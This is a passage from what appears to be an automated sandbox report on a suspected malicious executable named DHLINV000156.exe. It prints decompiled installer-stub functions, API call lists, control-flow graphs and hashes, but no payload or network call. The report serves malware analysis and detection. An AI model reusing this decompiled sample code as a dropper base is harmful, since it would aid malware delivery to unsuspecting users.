                                        							_v48 = _t29 - _t39;
                                        							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                        						}
                                        						if(_t39 != 0) {
                                        							_t28 = _a4;
                                        							 *((char*)(_t28 + 0x41f4e8)) = 0;
                                        							return _t28;
                                        						}
                                        					} else {
                                        						_t26 =  &(_a4[lstrlenA(_a8)]);
                                        						if(_t26 < 0x800) {
                                        							_t26 = lstrcatA(0x41f4e8, _a8);
                                        							goto L6;
                                        						}
                                        					}
                                        				}
                                        				return _t26;
                                        			}

















                                        0x00405107
                                        0x00405113
                                        0x00405116
                                        0x0040511c
                                        0x00405128
                                        0x0040512b
                                        0x0040512e
                                        0x00405134
                                        0x00405134
                                        0x0040513a
                                        0x00405142
                                        0x00405145
                                        0x00405162
                                        0x00405166
                                        0x0040516f
                                        0x0040516f
                                        0x00405179
                                        0x00405182
                                        0x0040518e
                                        0x00405195
                                        0x00405199
                                        0x0040519c
                                        0x004051af
                                        0x004051bd
                                        0x004051bd
                                        0x004051c1
                                        0x004051c3
                                        0x004051c6
                                        0x00000000
                                        0x004051c6
                                        0x00405147
                                        0x0040514f
                                        0x00405157
                                        0x0040515d
                                        0x00000000
                                        0x0040515d
                                        0x00405157
                                        0x00405145
                                        0x004051d0

                                        APIs
                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                        • lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll), ref: 0040516F
                                        • SendMessageA.USER32 ref: 00405195
                                        • SendMessageA.USER32 ref: 004051AF
                                        • SendMessageA.USER32 ref: 004051BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll
                                        • API String ID: 2531174081-299234604
                                        • Opcode ID: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                        • Instruction ID: da75402713979d4bf34db42cde910fb2485d85a1008762fbb7bcbbad6d42931f
                                        • Opcode Fuzzy Hash: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                        • Instruction Fuzzy Hash: BB219A71E00108BADF119FA4CD84ADFBFB9EF05354F04807AF404A6291C6798E419FA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 643 4055c7-405612 CreateDirectoryA 644 405614-405616 643->644 645 405618-405625 GetLastError 643->645 646 40563f-405641 644->646 645->646 647 405627-40563b SetFileSecurityA 645->647 647->644 648 40563d GetLastError 647->648 648->646
                                        C-Code - Quality: 100%
                                        			E004055C7(CHAR* _a4) {
                                        				struct _SECURITY_ATTRIBUTES _v16;
                                        				struct _SECURITY_DESCRIPTOR _v36;
                                        				int _t22;
                                        				long _t23;
                                        
                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                        				_v36.Owner = 0x40737c;
                                        				_v36.Group = 0x40737c;
                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                        				_v16.lpSecurityDescriptor =  &_v36;
                                        				_v36.Revision = 1;
                                        				_v36.Control = 4;
                                        				_v36.Dacl = 0x40736c;
                                        				_v16.nLength = 0xc;
                                        				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                        				if(_t22 != 0) {
                                        					L1:
                                        					return 0;
                                        				}
                                        				_t23 = GetLastError();
                                        				if(_t23 == 0xb7) {
                                        					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                        						goto L1;
                                        					}
                                        					return GetLastError();
                                        				}
                                        				return _t23;
                                        			}







                                        0x004055d2
                                        0x004055d6
                                        0x004055d9
                                        0x004055df
                                        0x004055e3
                                        0x004055e7
                                        0x004055ef
                                        0x004055f6
                                        0x004055fc
                                        0x00405603
                                        0x0040560a
                                        0x00405612
                                        0x00405614
                                        0x00000000
                                        0x00405614
                                        0x0040561e
                                        0x00405625
                                        0x0040563b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040563d
                                        0x00405641

                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                        • GetLastError.KERNEL32 ref: 0040561E
                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405633
                                        • GetLastError.KERNEL32 ref: 0040563D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ls@$|s@
                                        • API String ID: 3449924974-2493839503
                                        • Opcode ID: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                        • Instruction ID: d76da5e920ef4cf84c76b5f8b6eadacb43d526ba9f765b2b55af8eda6d007f2e
                                        • Opcode Fuzzy Hash: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                        • Instruction Fuzzy Hash: 90010871C04219EAEF019BA1CC447EFBBB8EB14355F00853AD905B6290E779A605CFAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 649 406304-406324 GetSystemDirectoryA 650 406326 649->650 651 406328-40632a 649->651 650->651 652 40633a-40633c 651->652 653 40632c-406334 651->653 655 40633d-40636f wsprintfA LoadLibraryExA 652->655 653->652 654 406336-406338 653->654 654->655
                                        C-Code - Quality: 100%
                                        			E00406304(intOrPtr _a4) {
                                        				char _v292;
                                        				int _t10;
                                        				struct HINSTANCE__* _t14;
                                        				void* _t16;
                                        				void* _t21;
                                        
                                        				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                        				if(_t10 > 0x104) {
                                        					_t10 = 0;
                                        				}
                                        				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                        					_t16 = 1;
                                        				} else {
                                        					_t16 = 0;
                                        				}
                                        				_t5 = _t16 + 0x409014; // 0x5c
                                        				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                        				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                        				return _t14;
                                        			}








                                        0x0040631b
                                        0x00406324
                                        0x00406326
                                        0x00406326
                                        0x0040632a
                                        0x0040633c
                                        0x00406336
                                        0x00406336
                                        0x00406336
                                        0x00406340
                                        0x00406354
                                        0x00406368
                                        0x0040636f

                                        APIs
                                        • GetSystemDirectoryA.KERNEL32 ref: 0040631B
                                        • wsprintfA.USER32 ref: 00406354
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                        • Instruction ID: 15cbb93803340843acffe9ced60e7e2f3372dd006ff9664fb566d465880257e2
                                        • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                        • Instruction Fuzzy Hash: C8F09C30900116ABDB159768DD0DFFB365CEB08309F14057AB986E11D1D574E9258B99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 656 402ffb-40300f 657 403011 656->657 658 403018-403020 656->658 657->658 659 403022 658->659 660 403027-40302c 658->660 659->660 661 40303c-403049 call 4031d7 660->661 662 40302e-403037 call 4031ed 660->662 666 40318e 661->666 667 40304f-403053 661->667 662->661 668 403190-403191 666->668 669 403177-403179 667->669 670 403059-403079 GetTickCount call 406497 667->670 671 4031d0-4031d4 668->671 672 4031c2-4031c6 669->672 673 40317b-40317e 669->673 681 4031cd 670->681 682 40307f-403087 670->682 675 403193-403199 672->675 676 4031c8 672->676 677 403180 673->677 678 403183-40318c call 4031d7 673->678 683 40319b 675->683 684 40319e-4031ac call 4031d7 675->684 676->681 677->678 678->666 689 4031ca 678->689 681->671 686 403089 682->686 687 40308c-40309a call 4031d7 682->687 683->684 684->666 693 4031ae-4031ba call 405c1a 684->693 686->687 687->666 694 4030a0-4030a9 687->694 689->681 699 403173-403175 693->699 700 4031bc-4031bf 693->700 696 4030af-4030cc call 4064b7 694->696 702 4030d2-4030e9 GetTickCount 696->702 703 40316f-403171 696->703 699->668 700->672 704 4030eb-4030f3 702->704 705 40312e-403130 702->705 703->668 708 4030f5-4030f9 704->708 709 4030fb-403126 MulDiv wsprintfA call 405101 704->709 706 403132-403136 705->706 707 403163-403167 705->707 710 403138-40313d call 405c1a 706->710 711 40314b-403151 706->711 707->682 712 40316d 707->712 708->705 708->709 716 40312b 709->716 717 403142-403144 710->717 715 403157-40315b 711->715 712->681 715->696 718 403161 715->718 716->705 717->699 719 403146-403149 717->719 718->681 719->715
                                        C-Code - Quality: 94%
                                        			E00402FFB(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                        				signed int _v8;
                                        				int _v12;
                                        				long _v16;
                                        				intOrPtr _v20;
                                        				char _v84;
                                        				void* _t59;
                                        				intOrPtr _t69;
                                        				long _t70;
                                        				void* _t71;
                                        				intOrPtr _t81;
                                        				intOrPtr _t86;
                                        				long _t89;
                                        				signed int _t90;
                                        				int _t91;
                                        				int _t92;
                                        				intOrPtr _t93;
                                        				void* _t94;
                                        				void* _t95;
                                        
                                        				_t90 = _a16;
                                        				_t86 = _a12;
                                        				_v12 = _t90;
                                        				if(_t86 == 0) {
                                        					_v12 = 0x8000;
                                        				}
                                        				_v8 = _v8 & 0x00000000;
                                        				_t81 = _t86;
                                        				if(_t86 == 0) {
                                        					_t81 = 0x4168c0;
                                        				}
                                        				_t56 = _a4;
                                        				if(_a4 >= 0) {
                                        					E004031ED( *0x423778 + _t56);
                                        				}
                                        				if(E004031D7( &_a16, 4) == 0) {
                                        					L33:
                                        					_push(0xfffffffd);
                                        					goto L34;
                                        				} else {
                                        					if((_a19 & 0x00000080) == 0) {
                                        						if(_t86 == 0) {
                                        							while(_a16 > 0) {
                                        								_t91 = _v12;
                                        								if(_a16 < _t91) {
                                        									_t91 = _a16;
                                        								}
                                        								if(E004031D7(0x4128c0, _t91) == 0) {
                                        									goto L33;
                                        								} else {
                                        									if(E00405C1A(_a8, 0x4128c0, _t91) == 0) {
                                        										L28:
                                        										_push(0xfffffffe);
                                        										L34:
                                        										_pop(_t59);
                                        										return _t59;
                                        									}
                                        									_v8 = _v8 + _t91;
                                        									_a16 = _a16 - _t91;
                                        									continue;
                                        								}
                                        							}
                                        							L43:
                                        							return _v8;
                                        						}
                                        						if(_a16 < _t90) {
                                        							_t90 = _a16;
                                        						}
                                        						if(E004031D7(_t86, _t90) != 0) {
                                        							_v8 = _t90;
                                        							goto L43;
                                        						} else {
                                        							goto L33;
                                        						}
                                        					}
                                        					_v16 = GetTickCount();
                                        					E00406497(0x40a830);
                                        					_t13 =  &_a16;
                                        					 *_t13 = _a16 & 0x7fffffff;
                                        					_a4 = _a16;
                                        					if( *_t13 <= 0) {
                                        						goto L43;
                                        					} else {
                                        						goto L9;
                                        					}
                                        					while(1) {
                                        						L9:
                                        						_t92 = 0x4000;
                                        						if(_a16 < 0x4000) {
                                        							_t92 = _a16;
                                        						}
                                        						if(E004031D7(0x4128c0, _t92) == 0) {
                                        							goto L33;
                                        						}
                                        						_a16 = _a16 - _t92;
                                        						 *0x40a848 = 0x4128c0;
                                        						 *0x40a84c = _t92;
                                        						while(1) {
                                        							 *0x40a850 = _t81;
                                        							 *0x40a854 = _v12; // executed
                                        							_t69 = E004064B7(0x40a830); // executed
                                        							_v20 = _t69;
                                        							if(_t69 < 0) {
                                        								break;
                                        							}
                                        							_t93 =  *0x40a850; // 0x4168c0
                                        							_t94 = _t93 - _t81;
                                        							_t70 = GetTickCount();
                                        							_t89 = _t70;
                                        							if(( *0x4237d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
                                        								wsprintfA( &_v84, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                        								_t95 = _t95 + 0xc;
                                        								E00405101(0,  &_v84); // executed
                                        								_v16 = _t89;
                                        							}
                                        							if(_t94 == 0) {
                                        								if(_a16 > 0) {
                                        									goto L9;
                                        								}
                                        								goto L43;
                                        							} else {
                                        								if(_a12 != 0) {
                                        									_v8 = _v8 + _t94;
                                        									_v12 = _v12 - _t94;
                                        									_t81 =  *0x40a850; // 0x4168c0
                                        									L23:
                                        									if(_v20 != 1) {
                                        										continue;
                                        									}
                                        									goto L43;
                                        								}
                                        								_t71 = E00405C1A(_a8, _t81, _t94); // executed
                                        								if(_t71 == 0) {
                                        									goto L28;
                                        								}
                                        								_v8 = _v8 + _t94;
                                        								goto L23;
                                        							}
                                        						}
                                        						_push(0xfffffffc);
                                        						goto L34;
                                        					}
                                        					goto L33;
                                        				}
                                        			}





















                                        0x00403003
                                        0x00403007
                                        0x0040300a
                                        0x0040300f
                                        0x00403011
                                        0x00403011
                                        0x00403018
                                        0x0040301c
                                        0x00403020
                                        0x00403022
                                        0x00403022
                                        0x00403027
                                        0x0040302c
                                        0x00403037
                                        0x00403037
                                        0x00403049
                                        0x0040318e
                                        0x0040318e
                                        0x00000000
                                        0x0040304f
                                        0x00403053
                                        0x00403179
                                        0x004031c2
                                        0x00403193
                                        0x00403199
                                        0x0040319b
                                        0x0040319b
                                        0x004031ac
                                        0x00000000
                                        0x004031ae
                                        0x004031ba
                                        0x00403173
                                        0x00403173
                                        0x00403190
                                        0x00403190
                                        0x00000000
                                        0x00403190
                                        0x004031bc
                                        0x004031bf
                                        0x00000000
                                        0x004031bf
                                        0x004031ac
                                        0x004031cd
                                        0x00000000
                                        0x004031cd
                                        0x0040317e
                                        0x00403180
                                        0x00403180
                                        0x0040318c
                                        0x004031ca
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040318c
                                        0x00403064
                                        0x00403067
                                        0x0040306c
                                        0x0040306c
                                        0x00403076
                                        0x00403079
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040307f
                                        0x0040307f
                                        0x0040307f
                                        0x00403087
                                        0x00403089
                                        0x00403089
                                        0x0040309a
                                        0x00000000
                                        0x00000000
                                        0x004030a0
                                        0x004030a3
                                        0x004030a9
                                        0x004030af
                                        0x004030b7
                                        0x004030bd
                                        0x004030c2
                                        0x004030c9
                                        0x004030cc
                                        0x00000000
                                        0x00000000
                                        0x004030d2
                                        0x004030d8
                                        0x004030da
                                        0x004030e7
                                        0x004030e9
                                        0x00403117
                                        0x0040311d
                                        0x00403126
                                        0x0040312b
                                        0x0040312b
                                        0x00403130
                                        0x00403167
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403132
                                        0x00403136
                                        0x0040314b
                                        0x0040314e
                                        0x00403151
                                        0x00403157
                                        0x0040315b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403161
                                        0x0040313d
                                        0x00403144
                                        0x00000000
                                        0x00000000
                                        0x00403146
                                        0x00000000
                                        0x00403146
                                        0x00403130
                                        0x0040316f
                                        0x00000000
                                        0x0040316f
                                        0x00000000
                                        0x0040307f

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 551687249-2449383134
                                        • Opcode ID: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                        • Instruction ID: eed10709806649b2ce9ecdbe6bed08e8f554dc741dea3641cf9b2fc180d08aa2
                                        • Opcode Fuzzy Hash: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                        • Instruction Fuzzy Hash: A7515E71901219ABDB10EF65D904A9F3BB8AF48756F14413BFD10BB2C0C7789E51CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 720 405ba2-405bac 721 405bad-405bd8 GetTickCount GetTempFileNameA 720->721 722 405be7-405be9 721->722 723 405bda-405bdc 721->723 725 405be1-405be4 722->725 723->721 724 405bde 723->724 724->725
                                        C-Code - Quality: 100%
                                        			E00405BA2(char _a4, intOrPtr _a6, CHAR* _a8) {
                                        				char _t11;
                                        				signed int _t12;
                                        				int _t15;
                                        				signed int _t17;
                                        				void* _t20;
                                        				CHAR* _t21;
                                        
                                        				_t21 = _a4;
                                        				_t20 = 0x64;
                                        				while(1) {
                                        					_t11 =  *0x4093b4; // 0x61736e
                                        					_t20 = _t20 - 1;
                                        					_a4 = _t11;
                                        					_t12 = GetTickCount();
                                        					_t17 = 0x1a;
                                        					_a6 = _a6 + _t12 % _t17;
                                        					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                        					if(_t15 != 0) {
                                        						break;
                                        					}
                                        					if(_t20 != 0) {
                                        						continue;
                                        					}
                                        					 *_t21 =  *_t21 & 0x00000000;
                                        					return _t15;
                                        				}
                                        				return _t21;
                                        			}









                                        0x00405ba6
                                        0x00405bac
                                        0x00405bad
                                        0x00405bad
                                        0x00405bb2
                                        0x00405bb3
                                        0x00405bb6
                                        0x00405bc0
                                        0x00405bcd
                                        0x00405bd0
                                        0x00405bd8
                                        0x00000000
                                        0x00000000
                                        0x00405bdc
                                        0x00000000
                                        0x00000000
                                        0x00405bde
                                        0x00000000
                                        0x00405bde
                                        0x00000000

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405BB6
                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BD0
                                        Strings
                                        • nsa, xrefs: 00405BAD
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BA5
                                        • "C:\Users\user\Desktop\DHLINV000156.exe", xrefs: 00405BA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\DHLINV000156.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-3452906124
                                        • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                        • Instruction ID: 2f7af396f84d097035df83fe1d719984909df90e6a6ed76a9758152acb097983
                                        • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                        • Instruction Fuzzy Hash: B9F082367082086BEB108F5ADC04B9B7BA8DF91750F14803BFA08DA291D6B4B9548B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 726 73ef16db-73ef1717 call 73ef1a98 730 73ef171d-73ef1721 726->730 731 73ef1834-73ef1836 726->731 732 73ef172a-73ef1737 call 73ef22f1 730->732 733 73ef1723-73ef1729 call 73ef22af 730->733 738 73ef1739-73ef173e 732->738 739 73ef1767-73ef176e 732->739 733->732 742 73ef1759-73ef175c 738->742 743 73ef1740-73ef1741 738->743 740 73ef178e-73ef1792 739->740 741 73ef1770-73ef178c call 73ef24d8 call 73ef1559 call 73ef1266 GlobalFree 739->741 744 73ef17dc-73ef17e2 call 73ef24d8 740->744 745 73ef1794-73ef17da call 73ef156b call 73ef24d8 740->745 766 73ef17e3-73ef17e7 741->766 742->739 746 73ef175e-73ef175f call 73ef2cc3 742->746 748 73ef1749-73ef174a call 73ef2a38 743->748 749 73ef1743-73ef1744 743->749 744->766 745->766 760 73ef1764 746->760 757 73ef174f 748->757 755 73ef1746-73ef1747 749->755 756 73ef1751-73ef1757 call 73ef26b2 749->756 755->739 755->748 765 73ef1766 756->765 757->760 760->765 765->739 770 73ef17e9-73ef17f7 call 73ef249e 766->770 771 73ef1824-73ef182b 766->771 776 73ef180f-73ef1816 770->776 777 73ef17f9-73ef17fc 770->777 771->731 773 73ef182d-73ef182e GlobalFree 771->773 773->731 776->771 779 73ef1818-73ef1823 call 73ef14e2 776->779 777->776 778 73ef17fe-73ef1806 777->778 778->776 780 73ef1808-73ef1809 FreeLibrary 778->780 779->771 780->776
                                        C-Code - Quality: 94%
                                        			E73EF16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                        				void _v36;
                                        				char _v88;
                                        				struct HINSTANCE__* _t37;
                                        				intOrPtr _t42;
                                        				void* _t48;
                                        				void* _t49;
                                        				void* _t50;
                                        				void* _t54;
                                        				intOrPtr _t57;
                                        				signed int _t61;
                                        				signed int _t63;
                                        				void* _t67;
                                        				void* _t68;
                                        				void* _t72;
                                        				void* _t76;
                                        
                                        				_t76 = __esi;
                                        				_t68 = __edi;
                                        				_t67 = __edx;
                                        				 *0x73ef405c = _a8;
                                        				 *0x73ef4060 = _a16;
                                        				 *0x73ef4064 = _a12;
                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x73ef4038, E73EF1556);
                                        				_push(1); // executed
                                        				_t37 = E73EF1A98(); // executed
                                        				_t54 = _t37;
                                        				if(_t54 == 0) {
                                        					L28:
                                        					return _t37;
                                        				} else {
                                        					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                        						E73EF22AF(_t54);
                                        					}
                                        					E73EF22F1(_t67, _t54);
                                        					_t57 =  *((intOrPtr*)(_t54 + 4));
                                        					if(_t57 == 0xffffffff) {
                                        						L14:
                                        						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
                                        							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                        								_t37 = E73EF24D8(_t54);
                                        							} else {
                                        								_push(_t76);
                                        								_push(_t68);
                                        								_t61 = 8;
                                        								_t13 = _t54 + 0x818; // 0x818
                                        								memcpy( &_v36, _t13, _t61 << 2);
                                        								_t42 = E73EF156B(_t54,  &_v88);
                                        								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
                                        								_t18 = _t54 + 0x818; // 0x818
                                        								_t72 = _t18;
                                        								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
                                        								 *_t72 = 3;
                                        								E73EF24D8(_t54);
                                        								_t63 = 8;
                                        								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                        							}
                                        						} else {
